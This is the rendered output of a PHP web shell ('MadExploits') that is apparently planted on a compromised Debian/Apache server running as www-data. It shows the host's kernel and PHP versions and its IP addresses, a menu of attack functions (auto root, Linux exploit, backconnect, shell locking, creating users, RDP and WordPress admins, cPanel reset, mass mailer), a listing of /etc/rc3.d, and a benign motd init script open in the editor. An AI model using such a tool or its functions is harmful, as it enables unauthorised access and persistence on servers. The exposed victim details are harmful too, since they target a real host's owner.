Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 18.222.153.154
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rc3.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K02spamassassin
1.89
KB
-rwxr-xr-x
K03slapd
5.05
KB
-rwxr-xr-x
README
677
B
-rw-r--r--
S01cloud-init-local
1.23
KB
-rwxr-xr-x
S01motd
995
B
-rwxr-xr-x
S01rsyslog
2.73
KB
-rwxr-xr-x
S01zabbix-agent
1.35
KB
-rwxr-xr-x
S02apache2
9.95
KB
-rwxr-xr-x
S03acct
1.82
KB
-rwxr-xr-x
S03acpid
2.19
KB
-rwxr-xr-x
S03amavis
3.56
KB
-rwxr-xr-x
S03atd
1.05
KB
-rwxr-xr-x
S03cloud-init
1.32
KB
-rwxr-xr-x
S03cron
2.98
KB
-rwxr-xr-x
S03dbus
2.75
KB
-rwxr-xr-x
S03fail2ban
6.23
KB
-rwxr-xr-x
S03gdomap
1.56
KB
-rwxr-xr-x
S03iredapd
2.06
KB
-rwxr-xr-x
S03irqbalance
1.88
KB
-rwxr-xr-x
S03mysql
5.36
KB
-rwxr-xr-x
S03proftpd
5.14
KB
-rwxr-xr-x
S03rsync
4.25
KB
-rwxr-xr-x
S03vsftpd
1.98
KB
-rwxr-xr-x
S04amavis-mc
4.36
KB
-rwxr-xr-x
S04cloud-config
1.3
KB
-rwxr-xr-x
S04dovecot
5.12
KB
-rwxr-xr-x
S04ssh
3.98
KB
-rwxr-xr-x
S05amavisd-snmp-subagent
4.54
KB
-rwxr-xr-x
S05bootlogs
1.25
KB
-rwxr-xr-x
S05postfix
7.32
KB
-rwxr-xr-x
S06cloud-final
1.46
KB
-rwxr-xr-x
S06rc.local
820
B
-rwxr-xr-x
S06rmnologin
1.02
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : S01motd
#!/bin/sh ### BEGIN INIT INFO # Provides: motd # Required-Start: hostname $local_fs # Required-Stop: # Should-Start: # Default-Start: 1 2 3 4 5 # Default-Stop: # Short-Description: Create dynamic part of /etc/motd # Description: /etc/motd is user-editable and static. This script # creates the initial dynamic part, by default the # output of uname, and stores it in /var/run/motd.dynamic. # Both parts are output by pam_motd. ### END INIT INFO PATH=/sbin:/usr/sbin:/bin:/usr/bin . /lib/init/vars.sh do_start () { # Update motd uname -snrvm > /var/run/motd.dynamic } do_status () { if [ -f /var/run/motd.dynamic ] ; then return 0 else return 4 fi } case "$1" in start|"") do_start ;; restart|reload|force-reload) echo "Error: argument '$1' not supported" >&2 exit 3 ;; stop) # No-op ;; status) do_status exit $? ;; *) echo "Usage: motd [start|stop|status]" >&2 exit 3 ;; esac :
Close